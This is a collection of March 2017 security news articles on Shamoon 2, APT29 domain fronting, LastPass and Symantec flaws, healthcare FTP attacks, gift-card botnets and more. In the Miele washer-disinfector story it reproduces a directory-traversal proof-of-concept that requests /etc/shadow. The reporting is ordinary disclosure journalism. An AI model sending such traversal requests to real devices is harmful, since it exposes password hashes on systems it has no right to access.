IBM recently reported that the attackers delivered the Shamoon 2 malware using weaponized documents, while Symantec reported that the Magic Hound and Greenbug groups may have helped conduct reconnaissance, including stealing credentials and creating persistent backdoors.

Threat actors used stolen credentials to deliver the malware on the target systems, according to researchers at Symantec they may have been provided by another cyber espionage group called Greenbug.

Greenbug hackers used the Ismdoor remote access Trojan (RAT) and other tools in attacks against organizations in the Middle East.

The Ismdoor establish a backdoor on the target machine and leverages PowerShell for command and control (C&C).

The group targeted organizations in multiple industries, including aviation, investment, government and education organizations in several countries (i.e. Saudi Arabia, Iran, Iraq, Bahrain, Qatar, Kuwait and Turkey, and a Saudi company in Australia).

Yesterday experts at Palo Alto networks shared details about their investigation about how the stolen credentials were used by the attackers.

The threat actors first compromised a single system on the network using the Remote Desktop Protocol (RDP) and stolen credentials, then used it as a distribution server. The machine was used to store the hacking tools and the malicious code used in the attack. Then the attackers attempted to connect to named systems on the network using compromised credentials to spread the Shamoon malware.

“Our analysis also shows an actor distributes Disttrack within the targeted network by first compromising a system that is used as the Disttrack distribution server on that network. The actor then uses this server to compromise other systems on the network by using the hostname to copy over and execute the Disttrack malware.” reads the blog post published by Palo Alto Networks. “On each of these named systems that are successfully compromised, the Disttrack malware will attempt to propagate itself to 256 additional IP addresses on the local network. This rudimentary, but effective, distribution system can enable Disttrack to propagate to additional systems from a single, initially compromised system in a semi-automated fashion.”

Shamoon 2

The researchers speculate the hackers obtained the information of the named hosts directly from Active Directory on a domain controller, a circumstance that suggests that the Shamoon 2 attackers used legitimate credentials in their operations.

“This rudimentary, but effective, distribution system can enable Disttrack to propagate to additional systems from a single, initially compromised system in a semi-automated fashion,” researchers said.

The researchers at Palo Alto Networks also explored a possible connection between the Shamoon 2 malware and the Magic Hound campaign, The researchers noticed that one of the command and control (C&C) servers used by Magic Hound and a server hosting the Shamoon files used IP addresses from the same range, namely 45.76.128.x. Both attacks also leveraged PowerShell and Meterpreter and targeted entities within Saudi Arabia.

“If the Magic Hound attacks are indeed related to the Shamoon attack cycle, we may be able to hypothesize that the Magic Hound attacks were used as a beachhead to perform reconnaissance for the adversaries and gather network information and credentials.” continues Palo Alto Networks.”This may be further supported by the initial Magic Hound payloads we discovered, Pupy RAT and Meterpreter, both of which have these types of capabilities.”

Summarizing Palo Alto Networks agrees with Symantec on the theory that threat actors behind the Shamoon 2 conducted the Magic Hound campaign as a reconnaissance phase their attacks.


Apple iOS 10.3 Fixes Safari Flaw Used in JavaScript-based Ransomware Campaign
28.3.2017 thehackernews Apple

If you own an iPhone or iPad, it's possible you could see popup windows in a sort of endless cycle on your Safari browser, revealing your browser has been locked and asking you to pay a fee to unlock it. Just do not pay any ransom.
A new ransomware campaign has been found exploiting a flaw in Apple's iOS Safari browser in order to extort money from users who view pornography content on their phones or attempt to illegally download pirated music or other sensitive content.
However, the good news is that Apple patched the web browser vulnerability on Monday with the release of iOS version 10.3.
The vulnerability resides in the way Safari displayed JavaScript pop-up windows, which allowed ransomware scammers to display an endless loop of pop-up windows, preventing victims to use the browser, researchers from mobile security provider Lookout said in a blog post published on Monday.
The victims eventually would end up on an attacker website that masquerades itself as a legitimate law enforcement site informing victims that they have to pay a fine for viewing illegal content in order to regain access to their browser.
Lookout researchers called the exploit "scareware," as the attack doesn't actually encrypt any data and hold it ransom. Rather the attack just scares victims into paying the ransom fee to unlock the browser.
"The scammers abused the handling of pop-up dialogs in Mobile Safari in such a way that it would lock out a victim from using the browser," Lookout explains.
"The attack would block the use of the Safari browser on iOS until the victim pays the attacker money in the form of an iTunes Gift Card. During the lockout, the attackers displayed threatening messaging in an attempt to scare and coerce victims into paying."
The scammers effectively used fear as a factor to get victims pay the fee before they realized that there was no real risk to their data and it's very easy to overcome this issue.
While overcoming the threat for users is as simple as clearing their browsing history and cache, iOS 10.3 users are no longer at risk of getting trapped in the endless cycle of JavaScript popups.
Lookout researchers shared the cause of this iOS exploit with Apple last month, and the company has promptly patched the issue with the release of iOS 10.3. Now, pop-up windows only take over a tab, instead of the entire app.
Those iOS 10.2 users who are already hit by this ransomware campaign can clear their browsing cache by navigating to Settings → Safari → Clear History and Website Data.


Symantec API Flaws reportedly let attackers steal Private SSL Keys and Certificates
28.3.2017 thehackernews Safety
A security researcher has disclosed critical issues in the processes and third-party API used by Symantec certificate resellers to deliver and manage Symantec SSL certificates.
The flaw, discovered by Chris Byrne, an information security consultant and instructor for Cloud Harmonics, could allow an unauthenticated attacker to retrieve other persons' SSL certificates, including public and private keys, as well as to reissue or revoke those certificates.
Even without revoking and reissuing a certificate, attackers can conduct "man-in-the-middle" attack over the secure connections using stolen SSL certs, tricking users into believing they are on a legitimate site when in fact their SSL traffic is being secretly tampered with and intercepted.
"All you had to do was click a link sent in [an] email, and you could retrieve a cert, revoke a cert, and re-issue a cert," Byrne wrote in a Facebook post published over the weekend.
Symantec knew of API Flaws Since 2015
Byrne said he first discovered the issues surrounding Symantec certificates in 2015 and agreed to "limited non-disclosure," as Symantec said the company would take nearly two years to fix the problems.
"Symantec committed to finding and replacing all of the certificates which MAY have been impacted, and then replace them... that they would do so within six months for every cert they could identify, and within two years for every cert period," Byrne said.
The researcher did not disclose any details to the public until last week when Google disclosed its plan to gradually distrust Symantec-issued certificates inside Google Chrome after discovering several issues with the company and four of its third-party cert resellers.
"Given Google's experience and actions here, it appears that Symantec did not fix these issues as they committed to," Byrne said.
However, Byrne was not able to verify that the vulnerability he found were exactly the same issue Google engineers disclosed last week.
According to Byrne, the certificate request and delivery API Symantec provides to its third-party resellers accept URI-based UIDs "without proper authentication, or in some cases, any authentication at all."
Since the API server didn't authenticate users prior to accessing certificate information, any potential tech-savvy customer could have easily intercepted an email containing the API-generated link or took their own UID and modified one of its parameters.
This would have, eventually, allowed the malicious attacker to access information on other Symantec customers, identifying high-value targets, and perform automated attacks.
Gaining Full Control Over Another User's SSL Certificates
Using the same API vulnerabilities, the attacker could have even gained full control over another customer's certificates, which includes obtaining public and private keys, revoking certs, or reissuing certs with new passphrases.
Currently, neither the researcher nor the company has discovered any evidence to prove such a scenario, but the possibility alone was enough for Byrne when considering disclosure.
"It would then be trivial to compromise DNS for a particular organization or person they wanted to attack. At that point, they could pretend to be that person's bank, their credit card company, their employer, anyone," Byrne added.
"Perhaps the worst compromise would be to spoof a patch and update server, for an entire company. Then every single machine at that company could be compromised simultaneously."
According to the researcher, Symantec has since fixed some of the issues, but not all. We have reached out to Symantec, and will update the story as soon as we hear back from the company.
Symantec has not yet responded to the Byrne's disclosure, though the company has recently published two blog posts accusing Google of "exaggerated and misleading" claims the search engine made last month regarding its CAs.


Targeted Attacks on Industrial Sector Increasingly Common: Kaspersky

28.3.2017 securityweek ICS 

Kaspersky Lab’s recently launched ICS-CERT department has published a report detailing the industrial sector threat landscape based on data collected by the company in the second half of 2016.

According to the security firm, its products have blocked attack attempts against more than 39 percent of protected industrial systems running Windows. This includes SCADA systems, data storage servers (i.e. historian), data gateways, engineer and operator workstations, and human-machine interfaces (HMI).

On average, the company detected attacks against roughly 20 percent of industrial computers every month in the second half of 2016. These devices were mainly attacked via the Internet (22%), removable media (11%) and email (8%).

Learn More at the 2017 Singapore ICS Cyber Security Conference

Kaspersky pointed out that while stationary workstations on the operational network (OT) don’t typically have an always-on Internet connection, the devices used by network administrators, developers and contractors can often freely connect to the Internet, and experts believe these machines are the most exposed.

In the case of email attacks, hackers leveraged common topics (e.g. banking, package delivery messages) to send malware hidden in VBS, JavaScript, Word, NSIS, AutoCAD, HTML, Java, BAT, PDF and Excel files.

The most targeted countries, relative to the total number of ICS they host, are Vietnam, Algeria, Morocco, Tunisia, Indonesia, Bangladesh, Kazakhstan, Iran, China, Peru, Chile, India, Egypt, Mexico and Turkey. The United States and Western European countries are far less targeted, according to Kaspersky data.

ICS attacks observed by Kaspersky

Kaspersky warned that targeted attacks aimed at organizations in industrial sectors are increasingly common. These campaigns involve both widely available malware and custom threats, including zero-day exploits.

One of the spear phishing campaigns observed by the security firm targeted more than 500 companies in over 50 countries worldwide. The attack, which is still ongoing, has mainly targeted industrial companies in sectors such as metallurgical, electric, construction and engineering.

The operation relied on social engineering emails sent from corporate mail servers previously infected with spyware designed to steal account credentials. The delivered malware was common, but the samples had been packed using VB and MSIL packers modified specifically for this attack.

As for non-targeted attacks, Kaspersky identified roughly 20,000 malware variants across more than 2,000 families on industrial systems. While many of these threats are Trojans, researchers also spotted worms, viruses, exploits and ransomware.

“Remarkably, there is very little difference between the rankings of malware detected on industrial computers and those of malware detected on corporate computers. We believe that this demonstrates the absence of significant differences between computers on corporate networks and those on industrial networks in terms of the risk of chance infections. However, it is obvious that even a chance infection on an industrial network can lead to dangerous consequences,” Kaspersky said in its report.

Kaspersky experts have identified a significant number of vulnerabilities in ICS products in the past months. Last year, they reported finding 75 flaws, including 58 rated highly critical. Only 30 of these security holes have been addressed as of March 2017.

Kaspersky Lab will be hosting its annual Security Analyst Summit (SAS) next week in St. Maarten. The company will aslo be presenting an overview of the industrial sector threat landscape at SecurityWeek's 2017 Singapore ICS Cyber Security Conference next month.


FBI Cyber Division warns the healthcare industry of FTP attacks
28.3.2017 securityaffairs Attack

The Cyber Division of the U.S. Federal Bureau of Investigation (FBI) warns the companies in the healthcare industry of FTP attacks.
The Cyber Division of the U.S. Federal Bureau of Investigation (FBI) warns the healthcare industry that malicious actors are actively targeting File Transfer Protocol (FTP) servers of medical and dental facilities that allow anonymous access.

FTP attacks

The attackers aim to steal protected health information (PHI) and personally identifiable information (PII) and use them for criminal purposes.

“The FBI is aware of criminal actors who are actively targeting File Transfer Protocol (FTP)a servers operating in “anonymous” mode and associated with medical and dental facilities to access protected health information (PHI) and personally identifiable information (PII) in order to intimidate, harass, and blackmail business owners.” reads the alert issued by the FBI.

The vulnerable FTP servers can also be abused by crooks to power cyber attacks of to store malicious tools.

“The FBI recommends medical and dental healthcare entities request their respective IT services personnel to check networks for FTP servers running in anonymous mode. If businesses have a legitimate use for operating a FTP server in anonymous mode, administrators should ensure sensitive PHI or PII is not stored on the server.”

According to a 2015 study conducted by the University of Michigan titled, “FTP: The Forgotten Cloud,” over 1 million FTP servers were configured to allow anonymous access. These servers were potentially exposing sensitive data due to the anonymous extension of FTP that allows a user to authenticate to the FTP server with a generic username (i.e. “anonymous”, “ftp”) with no password or using a generic password.

“In general, any misconfigured or unsecured server operating on a business network on which sensitive data is stored or processed exposes the business to data theft and compromise by cyber criminals who can use the data for criminal purposes such as blackmail, identity theft, or financial fraud,” the FBI warned.

In order to prevent FTP attacks, the FBI recommends medical and dental healthcare entities to check FTP servers in their organizations running in anonymous mode.

In case companies need to have an FTP server running in anonymous mode, they should not store sensitive PHI or PII on the server.


Are you a Docs.com user? Watch out you may have leaked passwords and other precious data
28.3.2017 securityaffairs Crime

Thousands of users of the Microsoft searchable Docs.com service have inadvertently exposed passwords and other private information on the Internet.
Bad news for thousands of users of the Microsoft searchable Docs.com service who have inadvertently exposed passwords and other private information on the Internet.

The Docs.com service allows people to easily exchange documents, it implements a useful search engine that helps users to search them for keywords.

“Docs.com is an online showroom where you can collect and publish Word documents, Excel workbooks, PowerPoint and Office Mix presentations, OneNote notebooks, PDF files, Sway stories, and Minecraft worlds. With Docs.com, it’s easy for you to share with others what interests you, and your content looks great on any device.” reads the description provided by Microsoft.

“Anything you publish with Public visibility will appear in worldwide search engine results and can be shared by you and others on social media sites. This option is a great way to get your work noticed. On the other hand, anything you publish with Limited visibility does not appear in search engine results and can be viewed only by people with whom a direct link to your content has been shared. Similarly, anything you publish with Organization visibility does not appear in search engine results and can be viewed only by those who sign in with a school or work account from your school or organization.”

A group of experts decided to analyze the service over the weekend searching for high private information. They started looking at files and documents containing search keys like “password” and “confidential,” and unfortunately the reality they discovered is disconcerting.

Follow
Kevin Beaumont ✔ @GossiTheDog
Microsoft have a website called http://docs.com where Office 365 customers can share anything in public. It has a search function.
2:24 AM - 25 Mar 2017
416 416 Retweets 515 515 likes
Thousands of users are accidentally sharing personal and sensitive data via Docs.com, the experts have found bank account details, password lists, medical records, social security numbers and even a divorce settlement or two.

Docs.com data leak

As you know this kind of information is a gift for hackers that could use them for illegal purposes such as financial scams and identity thefts.

Evidently, the issue is caused by thousands of people from Office 365 subscribers to others with Microsoft single-sign-on accounts were labeling sensitive documents as public allowing Microsoft search engine to find them.
Following the disconcerting discovery of the researchers, Microsoft temporarily shut down the search function, and of course alerted affected users. Unfortunately, this measure is not sufficient to remove the information accidentally shared on the Internet because many pages containing sensitive and personal information have been already cashed by other web services and are available to search engines.
“As part of our commitment to protect customers, we’re taking steps to help those who may have inadvertently published documents with sensitive information,” a spokesperson told The Reg. “Customers can review and update their settings by logging into their account at www.docs.com.”

Every time you use a web service it is essential to check security and privacy settings to avoid such kind of issues. Regarding the specific case, check if you and your colleagues has shared info on the Docs.com labeling it as public.


Shamoon 2 Used Rudimentary Method for Network Distribution

28.3.2017 Securityweek Virus
Palo Alto Networks researchers have continued to analyze the Shamoon 2 attacks and determined that the method used by the malware to spread on the targeted organizations' networks is rudimentary, but efficient.

The latest waves of attacks involving the disk-wiping malware Shamoon, aka Disttrack, have been analyzed by several security firms. IBM reported recently that the attackers delivered Shamoon using weaponized documents, and researchers have found connections to several other Iran-linked threat actors, including Charming Kitten (aka Newscaster, NewsBeef), Rocket Kitten, Magic Hound (aka Timberworm, COBALT GYPSY), and Greenbug.

It has been known that the Shamoon 2 attacks involved stolen credentials and that the threat actors had access to the targeted organizations’ networks well before the malware initiated its destructive routines. Symantec reported that the Magic Hound and Greenbug groups may have helped conduct reconnaissance, including stealing credentials and creating persistent backdoors.

In a blog post published on Monday, Palo Alto Networks said it managed to determine exactly how the stolen credentials were used by the attackers.

According to researchers, the hackers first compromised a single system on the network using the Remote Desktop Protocol (RDP) and stolen credentials. This machine, which became their distribution server, stored the attackers’ tools and malware. From this distribution server, the attackers attempted to connect to named systems on the network using compromised credentials and infect them with the Shamoon malware.

From the named systems, the malware identified up to 256 IP addresses on the local network and spread to those devices. Then, from the newly infected systems, the malware attempted to spread to other 256 IP addresses on the local network.

Experts believe the information on named hosts was obtained directly from Active Directory on a domain controller, which also suggests that the attackers used legitimate credentials in their operations.

“This rudimentary, but effective, distribution system can enable Disttrack to propagate to additional systems from a single, initially compromised system in a semi-automated fashion,” researchers said.

Palo Alto Networks has also found more evidence linking the Shamoon attacks to the Magic Hound group. According to the security firm, one of the command and control (C&C) servers used by Magic Hound and a server hosting Shamoon files used IP addresses from the same range, namely 45.76.128.x. Another similarity is related to the use of PowerShell and Meterpreter.

Palo Alto Networks agrees with Symantec on the theory that Magic Hound may have conducted the reconnaissance phase of the Shamoon 2 attacks.


Google Researcher Finds New Flaw in LastPass

28.3.2017 Securityweek Vulnerebility
Google Project Zero researcher Tavis Ormandy has identified yet another serious vulnerability in the LastPass browser extension. The developers of the password manager are aware of the flaw and are working on a patch.

Since the vulnerability has not been fixed, only few details have been made public by Ormandy and LastPass. The researcher said the security hole affects the latest version of the app, and the exploit he developed should work on all web browsers.

Similar to a previously found weakness, this vulnerability can be exploited to steal a user’s passwords and, if the LastPass binary component is enabled, execute arbitrary code.

“This attack is unique and highly sophisticated,” LastPass said in a blog post. “We don’t want to disclose anything specific about the vulnerability or our fix that could reveal anything to less sophisticated but nefarious parties. So you can expect a more detailed post mortem once this work is complete.”

Since these vulnerabilities can typically be exploited by getting the targeted user to access a specially crafted web page, LastPass has advised customers to protect themselves against potential attacks by using the LastPass Vault to access websites in order to ensure that the site they visit is legitimate. Users have also been advised to enable two-factor authentication when possible and beware of phishing attempts.

In recent weeks, Ormandy has identified several serious LastPass vulnerabilities that can be exploited to steal user passwords or execute arbitrary code. LastPass has released patches within days after learning of their existence. The fixes are pushed out automatically and users don’t have to take any action.

There is no evidence of exploitation in the wild and LastPass told users that there is no need to change any passwords.

One of the vulnerabilities found by the Google researcher affected the 3.3.2 version of the Firefox extension. LastPass addressed the vulnerability, but the company pointed out that it plans to retire this branch in the near future.


Botnet Pummels Retail Websites in Hunt for Gift Card Balances

28.3.2017 Securityweek BotNet

Malicious Bot Checked More Than 4 Million Gift Card Numbers Per Hour in Search of Active Cards With Balances

A recently discovered Internet bot is conducting sustained attacks against retailers and checking millions of gift card numbers to determine if any have balances, Distil Networks researchers warn.

Dubbed GiftGhostBot, the sophisticated bot was detected on February 26, 2017 and has managed to hit nearly 1,000 websites to date, the researchers say. The bot is still active, and targeting retailers around the world at a rate of millions of requests per hour.

“The websites of retailers all over the globe are targets. Gift cards are typically associated with a particular company, and can be used to purchase any item sold by that company. Any website with gift card processing capability, including checking your gift card balance or replenishing funds, is a potential target,” the security firm reveals.

The bot uses card cracking or token cracking attacks where automation is leveraged to test a list of potential account numbers and request the balance. When such a balance is provided, the attacker knows that the account number exists and contains funds.

This information allows bot operators to use the account number to purchase goods, though they could also sell those accounts on the dark web. Stealing money from gift cards is typically anonymous and untraceable, allowing cybercriminals to abuse the method with little fear of being caught.

GiftGhostBot was observed reaching peaks of over 4 million requests per hour on some retailer websites, hitting nearly ten times the normal level of traffic on those domains. In addition to stealing user’s funds, the bot can cause slowdowns or site downtime.

Distil Networks classifies GiftGhostBot as an Advanced Persistent Bot (APB), because it has multiple functions. The bot rotates user-agent strings to hide its identity and is heavily distributed across various hosting providers and data centers worldwide. Moreover, it can mimic a normal browser, courtesy of high sophistication when executing JavaScript, and shows increased flexibility in the use of different attack techniques to avoid being blocked.

Distil Networks found five main profiles used in the attack, with the first three used at the beginning of the campaign, and the other two (where the bot identified itself as iPhone and Android user agents) developed after the previous ones were blocked. GiftGhostBot appears well-funded, considering that the cost of the attack increased significantly with the new profiles, as each “request would cost at least five times more by using mobile ISPs,” the researcher say.

“We detected on average 6,400 unique fingerprints per hour. Because the device fingerprint is more accurate than an IP address and user agent you see the average number of user agents detected were higher at 6,500 per hour, and that IP addresses were detected at an average rate of 29,000 per hour. All of these numbers indicate that the bot was distributing itself widely and trying to hide,” Distil's researchers said.

While retailers shouldn’t be blamed for these attacks, they can thwart them by implementing a CAPTCHA on the Check-your-Gift-Card-Balance pages, by keeping an eye on their traffic to determine if they are targeted, and by limiting the number of requests on gift card pages.

Consumers are advised to always keep track of their balance and to not leave money unused. However, because some retailers web sites are under sustained attack from this bot, users might experience issues when attempting to check the balance on their gift cards. For example, websites might seem unable to provide the requested information, Distil Networks explains.


FBI Warns Healthcare Industry of FTP Attacks

28.3.2017 Securityweek Attack

The Cyber Division of the U.S. Federal Bureau of Investigation (FBI) has issued an alert to warn the healthcare industry that malicious actors are actively targeting File Transfer Protocol (FTP) servers that allow anonymous access.

According to the law enforcement agency, attackers have targeted the FTP servers of medical and dental facilities in an effort to obtain access to protected health information (PHI) and personally identifiable information (PII), and use it to intimidate, blackmail and harass business owners.

“The FBI recommends medical and dental healthcare entities request their respective IT services personnel to check networks for FTP servers running in anonymous mode. If businesses have a legitimate use for operating a FTP server in anonymous mode, administrators should ensure sensitive PHI or PII is not stored on the server,” the FBI said.

The agency cited research conducted in 2015 by the University of Michigan, which showed that more than one million FTP servers had been configured for anonymous access. These servers allow users to authenticate with only a username, such as “anonymous” or “ftp,” and either a generic password or no password at all.

The FBI pointed out that vulnerable FTP servers can also be abused to store malicious tools or to launch cyberattacks.

“In general, any misconfigured or unsecured server operating on a business network on which sensitive data is stored or processed exposes the business to data theft and compromise by cyber criminals who can use the data for criminal purposes such as blackmail, identity theft, or financial fraud,” the FBI warned.

In 2015, IBM named healthcare as the most attacked industry, with more than 100 million records compromised, after in the previous year this sector did not even make it to the top five. An IBM report for 2016 showed that the volume of compromised records was smaller, but the number of data breaches increased, causing operational, reputational and financial damage to healthcare organizations.

A report published recently by Fortinet showed the top threats targeting healthcare companies in the last quarter of 2016, including malware, ransomware, IPS events, exploit kits and botnets.


Let's Encrypt Issues 15,000 Fraudulent "PayPal" Certificates Used for Cybercrime

28.3.2017 Securityweek CyberCrime
Free and open Certificate Authority (CA) Let’s Encrypt has issued nearly 15,000 certificates containing the term “PayPal” for phishing sites to date, a security researcher has discovered.

According to encryption expert Vincent Lynch, 96.7% of the 15,270 security certificates containing the term PayPal that Let’s Encrypt has issued since March last year have been issued for phishing sites. Most of these certificates have been issued since November 2016.

Launched publicly in December 2015 and out of beta in April 2016, Let’s Encrypt is an initiative built on the idea of encrypting websites and serving them over Transport Layer Security (TLS), thus protecting users’ data from eavesdroppers. The CA’s certificates are offered for free, and the issuance and maintenance processes are automated, to make it easier for website owners to obtain certificates.

Even before being launched, Let’s Encrypt fueled fears that it could be abused by cybercriminals for their nefarious purposes. What’s more, the CA claims that it is not its job to stop malicious sites from using its certificates, meaning that phishers can use its certificates without fearing they might be banned, Lynch notes.

“Despite the concerns of many around the industry, Let’s Encrypt’s stance is in full compliance with industry standards. Regardless, that policy in combination with offering free certificates does create a very attractive environment for phishers,” he says.

In early March, the encryption expert urged Let’s Encrypt to stop issuing PayPal certificates because of their use for phishing. At the time, he estimated that the CA had issued 988 certificates containing the term PayPal, and that 99.5% of them were being used (or had been used) for phishing.

Now, based on newly received data, Lynch says that the previous number was a great underestimation and that Let’s Encrypt actually issued a total of 15,270 SSL certificates containing the word “PayPal,” 14,766 of which were (or are) used for phishing. The estimation is based on the analysis of a random sample of 1,000 certificates, 96.7% of which were intended for use on phishing sites.

The number of PalPal certificates issued by Let’s Encrypt has been growing at a steady rate of around 1250 per month since November last year, which was also the first month during which more than 1000 such certificates were issued (and twice the amount issued during the previous month). Thus, the CA issued 2530 PayPal certificates in December 2016, 3995 in January 2017, and 5101 in February 2017.

According to Lynch, there’s no apparent specific cause for the increase. However, it seems that the issuance rate has started to decline this month. Even so, Let’s Encrypt is expected to issue 20,000 additional PayPal certificates by the end of this year.

Phishing sites usually have a very short lifespan, mainly because they tend to be flagged and blocked rather fast, which explains why cybercriminals tend to register as many of them as possible. Making them look as legitimate as possible also helps these sites stay alive for longer.

“The various initiatives encouraging HTTPS are likely to appeal to phishers as well. There are a number of performance benefits (such as HTTP/2) only available to sites using HTTPS. In addition, sites using valid SSL certificates are given trusted UI indicators by browsers (the padlock icon in all browsers, the “Secure” label in Chrome) which make a phishing site look more legitimate,” Lynch notes.

In a mailed comment, Ilia Kolochenko, CEO of web security company High-Tech Bridge, told SecurityWeek that he agrees that CAs shouldn’t be responsible with the blocking of malicious websites from getting security certificates.

“I think we should separate HTTP traffic encryption and website identity verification questions. Let’s Encrypt’s mission is to globally convert plaintext HTTP traffic to encrypted HTTPS traffic, and they are doing it pretty well. Nonetheless, they should have foreseen massive abuse by phishers, and implement at least some basic security verifications, such as refusing SSL certificates for domains that contain popular brand names inside,” he said.

According to Kolochenko, the fact that web browsers mark HTTPS sites as trusted is actually a bigger issue in this regard, because they encourage users to blindly trust the website without any justifiable reason. Because of that, he says, it’s rather difficult to measure whose carelessness contributed more to the increase in phishing campaigns.

However, he also voiced fears that the idea of encrypting all web traffic could result in malware being able to bypass security mechanisms more efficiently:

“I am quite sure that if we will see how many of Let’s Encrypt SSL certificates are used by malware to exfiltrate stolen data – results will be pretty scary. Therefore, it’s difficult to predict how Let’s Encrypt will shape its growth strategy in the future to preclude cybercriminals from abusing its desire to make the web safer.”

Representatives from the Linux Foundation (the group behind the Let's Encrypt project) did not immediately respond to a request for comment.


APT29 group used domain fronting to evade detection long before these techniques were widely known
28.3.2017 Securityweek APT

Experts at FireEye discovered the APT29 group adopted domain fronting long before these techniques were widely known in the IT security community.
Security firm FireEye continues to follow APT29 group (aka The Dukes, Cozy Bear and Cozy Duke), on Monday it revealed that the cyber spies have been using a technique called “domain fronting” to make hard the attribution of their attacks.

In December, the Signal development team introduced the ‘domain fronting’ technique to circumvent censorship.

The astonishing news is that the APT29 group adopted domain fronting long before these techniques were widely known in the IT security community.

The domain fronting is a technique that relies on the use of different domain names at different application layers to evade censorship.

APT29 group domain fronting

The domain fronting techniques “hides the remote endpoint of a communication. Domain fronting works at the application layer, using HTTPS, to communicate with a forbidden host while appearing to communicate with some other host, permitted by the censor,” as described in a paper published by researchers from the University of California, Berkeley, Psiphon, and Brave New Software.

“The key idea is the use of different domain names at different layers of communication. One domain appears on the “outside” of an HTTPS request—in the DNS request and TLS Server Name Indication—while another domain appears on the “inside”—in the HTTP Host header, invisible to the censor under HTTPS encryption.” continues the paper.”A censor, unable to distinguish fronted and nonfronted traffic to a domain, must choose between allowing circumvention traffic and blocking the domain entirely, which results in expensive collateral damage”

The Domain fronting technique is easy to deploy and use and doesn’t require special activities by network intermediaries.

The APT29 group has used the Domain fronting technique for at least two years, the hackers leveraged the Tor network to communicate with infected machines. In order to disguise Tor traffic as apparently legitimate traffic, the cyberspies used Meek, a Tor plugin that was specific designed to implement the domain fronting technique and allows users to send traffic to Tor inside a harmless-looking HTTPS POST request to google.com.

APT29 group domain fronting

“APT29 has used The Onion Router (TOR) and the TOR domain fronting plugin meek to create a hidden, encrypted network tunnel that appeared to connect to Google services over TLS.” reads the analysis published by FireEye. “This tunnel provided the attacker remote access to the host system using the Terminal Services (TS), NetBIOS, and Server Message Block (SMB) services, while appearing to be traffic to legitimate websites. The attackers also leveraged a common Windows exploit to access a privileged command shell without authenticating.”

The attackers installed the Tor client and the Meek plugin on the targeted system by using a PowerShell script and a .bat file.

The APT29 group leveraged the Sticky Keys exploit to replace the legitimate executable with the Windows Command Prompt (cmd.exe) file and gain a shell on the targeted system with SYSTEM-level privileges. In this way, the attackers were able to execute several commands, including adding new accounts.

“The attacker executed the PowerShell script C:\Program Files(x86)\Google\start.ps1 to install the TOR services and implement the “Sticky Keys” exploit. This script was deleted after execution, and was not recovered.” continues the analysis.

The script that executes the Sticky Keys exploit is also used to gain persistence on the target machine, it creates a Windows service named “Google Update.”

“By employing a publicly available implementation, they were able to hide their network traffic, with minimal research or development, and with tools that are difficult to attribute. Detecting this activity on the network requires visibility into TLS connections and effective network signatures.” concluded the analysis.


Miele Professional PG 8528 washer-disinfector affected by a Web Server Directory Traversal
28.3.2017 Securityweek IoT

An Internet-Connected Medical Washer-Disinfector, the Miele’s model Professional PG 8528, is affected by a Web Server Directory Traversal.
While the number of IoT devices continue to exponentially increase, the level of security of these smart objects is often not adequate end exposes users at risk of cyber attacks.

The news of the say is a security vulnerability reported at Full Disclosure that affects Internet-connected washer-disinfector appliance manufactured by the Germany-based vendor Miele.

washer-disinfector
According to the security advisory, the Miele Professional PG 8528 appliance is affected by a Web Server Directory Traversal vulnerability tracked as CVE-2017-7240. The Miele Professional PG 8528 is a medical equipment used to disinfect laboratory and surgical instruments. The flaw could be exploited by an unauthenticated attacker to access any directory on the web server.

“The corresponding embeded webserver “PST10 WebServer” typically listens to port 80 and is prone to a directory traversal attack, therefore an unauthenticated attacker may be able to exploit this issue to access sensitive information to aide in subsequent attacks.” reads the advisory.

The flaw could allow attackers to access sensitive data on the server, to drop and execute malicious code on the web server.

The flaw was discovered by the expert Jens Regel at the German consultancy Schneider & Wulf who reported the issue to Mele in December 2016. Unfortunately, he did not receive the reply from the company, so after four months he decided to publicly disclose it.

Regel also published a proof-of-concept (PoC) exploit code for this flaw, for this reason, it is important that the vendor will fix the issue as soon as possible.

Do you want to hack the Mele washer-disinfector?

It is simple, the PoC exploit code that is used by the expert to request the embedded system’s shadow file and any file on the filesystem.

Proof of Concept:
=================
~$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character ist '^]'.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1 to whatever IP the dishwasher has on the LAN.
Waiting for a patch disconnect the washer-disinfector from the Internet.


Kaspersky využívá pro detekci hrozeb strojové učení v cloudu

28.3.2017 SecurityWorld Zabezpečení
Fraud Prevention Cloud umožní čelit podvodům realizovaným skrze internetové služby. Alespoň to slibují experti firmy Kaspersky Lab, které novinku vyvinuli a využili v ní pokročilé metody detekce.

Kromě prevence podvodů pro koncové stanice a mobilní zařízení poskytuje platforma i řadu cloudových technologií navržených přímo pro ochranu bank, finančních institucí, či vládních agentur.

Patří mezi ně kromě reputační databáze GDR (global device reputation) také analýza zařízení a prostředí, behaviorální analytika, biometrie a tzv. clientless malwarová detekce.

Například behaviorální analýza a biometrie pomáhají zjistit, jestli je uživatelem skutečná osoba, aniž by po něm byla vyžadována jakákoliv další aktivita. Toto chování se analyzuje prostřednictvím pohybů myši, klikání, skrolování nebo úderů na klávesnici. U mobilních zařízení se provádí za pomoci akcelerometru/gyroskopu a gest (dotyků, tahů atd.).

Fraud Prevention Cloud shromažďuje a analyzuje informace o uživatelově chování, jeho přístroji, prostředí a relacích v podobě anonymizovaných a neosobních big dat v cloudu. Díky tomu jsou v off-line prostředí k dispozici pro expertní forenzní a automatické analýzy.

Nově jsou také k dispozici informace pro interní Enterprise Fraud Management systém, což umožní včasnou proaktivní detekci podvodů v reálném čase ještě před tím, než dojde k jejich realizaci.

Tento přístup se zakládá na technologii Kaspersky Humachine – ta je kombinací big dat, výzkumů a analýz hrozeb za asistence algoritmů strojového učení a odbornosti firemních bezpečnostních týmů.

Ověřování na základě analýzy rizik (Risk Based Authentication, RBA) zase vyhodnotí riziko ještě před tím, než se uživatel přihlásí do digitálního kanálu. Interní backendové systémy jsou na jeho základě informovány o tom, zda mají přístup povolit, vyžádat si dodatečné ověření nebo ho zablokovat.

Tento prvek zlepšuje uživatelskou zkušenost tím, že minimalizuje počet autentifikačních kroků pro oprávněné uživatele, přičemž neoprávněného uživatele odhalí ještě před spácháním podvodu.

Nepřetržitá detekce anomálií v provozu (Continuous Session Anomaly Detection) navíc pomáhá detekovat podvodné aktivity tím, že identifikuje neoprávněné přístupy k účtu, nové podvodné aktivity na účtu, praní špinavých peněz, automatizované nástroje a další podezřelé procesy v průběhu provozu.

